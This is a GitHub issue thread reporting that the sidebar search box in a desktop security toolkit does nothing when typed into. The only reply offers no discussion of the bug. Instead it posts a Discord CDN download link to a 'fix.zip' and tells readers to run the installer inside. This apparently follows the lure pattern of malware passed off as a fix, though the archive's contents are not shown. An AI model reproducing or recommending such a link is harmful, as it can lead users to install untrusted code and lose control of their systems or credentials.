### ISSUE TITLE
[Bug]: Non-popup search box non-functional

### ISSUE THREAD

**Issue by slpysiren** [Hardhat-Enterprises/Deakin-Detonator-Toolkit#833]
### Name of Bug

Non-popup search box non-functional

### What Happened?

The search box shown on the left of the application, when clicked, brings up a separate search overlay. The search box you click on originally can be typed into but with no effect.

### Steps to Reproduce

- Click on the search box to bring up the search overlay
- Close the search overlay by pressing escape or clicking elsewhere
- Type freely into the search box

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
